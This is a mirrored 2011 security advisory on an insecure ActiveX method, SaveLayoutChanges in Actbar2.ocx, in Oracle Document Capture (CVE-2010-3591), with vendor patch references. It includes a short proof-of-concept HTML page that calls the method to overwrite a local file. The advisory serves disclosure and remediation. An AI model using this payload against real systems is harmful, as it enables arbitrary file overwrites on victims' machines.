Lucene search

K
packetstormSh2kerrPACKETSTORM:97866
HistoryJan 25, 2011 - 12:00 a.m.

Oracle Document Capture Actbar2.ocx Insecure Method

2011-01-2500:00:00
Sh2kerr
packetstormsecurity.com
45

0.067 Low

EPSS

Percentile

93.1%

`ActiveX components contain insecure methods.  
  
Digital Security Research Group [DSecRG] Advisory #DSECRG-00153  
  
  
  
Application: Oracle Document Capture  
Versions Affected: Release 10gR3  
Vendor URL: www.oracle.com  
Bugs: insecure method, File overwriting  
Exploits: YES  
Reported: 22.03.2010  
Vendor response: 31.03.2010  
Date of Public Advisory:24.01.2011  
CVE-number: CVE-2010-3591  
Author: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)  
  
  
  
Description  
***********  
  
Oracle Document Capture contains ActiveX components that contains insecure methods.  
  
Insecure method in Actbar2.ocx  
  
  
Details  
*******  
  
Oracle Document Capture contains ActiveX component ActiveBar2Library (Actbar2.ocx) Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9}  
  
which is contains insecure method "SaveLayoutChanges" that can overwrite any unhidden file in system.   
  
Class ActiveBar2  
GUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9}  
Number of Interfaces: 1  
Default Interface: IActiveBar2  
RegKey Safe for Script: True  
RegKey Safe for Init: True  
KillBitSet: False  
  
  
  
Exploit  
*******  
  
Attacker can construct html page which call vulnerable function "SaveLayoutChanges" from ActiveX component Actbar2.ocx  
  
Example:  
  
<HTML>  
<HEAD>  
<TITLE>DSecRG</TITLE>  
</HEAD>  
<BODY>  
  
<OBJECT id='eds' classid='clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9'></OBJECT>  
  
<SCRIPT>  
  
function Exploit(){  
eds.SaveLayoutChanges("C:\\31337.txt",1);   
}  
Exploit();  
  
</SCRIPT>  
</BODY>  
</HTML>  
  
  
  
References  
**********  
  
http://dsecrg.com/pages/vul/show.php?id=304  
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html  
  
  
  
  
Fix Information  
*************  
  
Information was published in CPU Jan 2011.  
All customers can download CPU patches following instructions from:   
  
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html  
  
  
About  
*****  
  
Digital Security:   
  
Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.  
  
Digital Security Research Group:  
  
International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product "ERPSCAN security suite for SAP NetWeaver" and service "ERPSCAN Online" which can help customers to perform automated security assessments and compliance checks for SAP solutions.  
  
  
Contact: research [at] dsecrg [dot] com  
http://www.dsecrg.com  
http://www.erpscan.com  
  
  
  
  
  
Polyakov Alexandr. PCI QSA,PA-QSA  
CTO Digital Security  
Head of DSecRG  
______________________  
DIGITAL SECURITY  
phone: +7 812 703 1547  
+7 812 430 9130  
e-mail: [email protected]   
  
www.dsec.ru  
www.dsecrg.com www.dsecrg.ru  
www.erpscan.com www.erpscan.ru  
www.pcidssru.com www.pcidss.ru  
  
  
-----------------------------------  
This message and any attachment are confidential and may be privileged or otherwise protected   
from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure   
is strictly prohibited. If you have received this message in error, please notify the sender immediately   
either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence   
via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding   
statements by e-mail unless otherwise agreed.   
-----------------------------------  
`